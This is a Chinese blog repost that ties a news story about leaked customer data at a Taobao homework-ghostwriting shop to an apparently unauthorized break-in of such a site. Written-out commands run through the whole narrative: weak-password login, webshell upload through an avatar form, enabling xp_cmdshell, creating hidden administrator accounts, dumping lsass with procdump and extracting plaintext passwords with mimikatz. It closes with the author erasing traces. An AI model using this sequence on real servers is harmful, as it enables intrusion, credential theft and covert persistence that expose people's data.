某宝找人代写作业,发现信息被泄露,店家回复:遭黑客攻击

近日,一小伙在淘宝找人代写作业后,半个月内接到多个骚扰电话和诈骗电话,觉得自己信息被严重泄漏,找店家质问,店家回复:代写链接遭黑客攻击。

黑客是如何做到的?

一个弱口令进了后台

某宝找人代写作业,发现信息被泄露,店家回复:遭黑客攻击

 

其实这个站有注入,不过既然进了后台,那肯定要去shell啊,

找了个学生的账号登陆进入发现了头像上传点可以任意文件上传

直接传了个大马,执行命令看下权限

某宝找人代写作业,发现信息被泄露,店家回复:遭黑客攻击_第1张图片

 

这权限也太小了吧,先来提权,看下补丁

某宝找人代写作业,发现信息被泄露,店家回复:遭黑客攻击_第2张图片

 

这还不随便打了,传了几个提权exe之后发现都执行不了,可能被杀软杀掉了,然后尝试抓hash

某宝找人代写作业,发现信息被泄露,店家回复:遭黑客攻击_第3张图片

 

看来只有pwdump7.exe没被杀了,但是权限不够

现在我们的权限能去读一些文件,去翻一翻sqlserver的密码,尝试sqlserver来提权

开启xp_cmdshell

exec sp_configure 'show advanced options', 1;reconfigure;
exec sp_configure 'xp_cmdshell',1;reconfigure;

某宝找人代写作业,发现信息被泄露,店家回复:遭黑客攻击_第4张图片

 

成了,有权限了,尝试加个管理员?

exec master..xp_cmdshell 'net user test pinohd123. /add'    添加用户test,密码test


exec master..xp_cmdshell 'net localgroup administrators test add'    添加test用户到管理员组

Wtm,加不上啊,杀软拦了,再次使用pwdump7来抓hash

某宝找人代写作业,发现信息被泄露,店家回复:遭黑客攻击_第5张图片

 

本来就开着3389,直接连上去

某宝找人代写作业,发现信息被泄露,店家回复:遭黑客攻击_第6张图片

 

Wtm开着管家和金山,传的东西都被拦截了,关掉杀软,先加个隐藏用户

net user test$ pinohd123. /add
net localgroup administrators test$ add

 

这里lz1y告诉我也可以procdump去搞,procdump是官方的工具,不会被杀软杀

exec master..xp_cmdshell 'xxxx\images\button\Procdump.exe -accepteula -ma lsass.exe -o xxx.dmp'

某宝找人代写作业,发现信息被泄露,店家回复:遭黑客攻击_第7张图片

 

把2.dmp存到本来来配合mimikatz

mimikatz.exe
sekurlsa::minidump 2.dmp
sekurlsa::logonPasswords full

某宝找人代写作业,发现信息被泄露,店家回复:遭黑客攻击_第8张图片

 

某宝找人代写作业,发现信息被泄露,店家回复:遭黑客攻击_第9张图片

 

同样拿到明文。

奈何没有域,擦了脚印溜了。

更多网络安全资讯、漏洞渗透以及海量干货可以关注我的公众号:网络安全情报局

作者:先知社区-p0desta

原文:
https://xz.aliyun.com/t/5646

你可能感兴趣的:(渗透测试)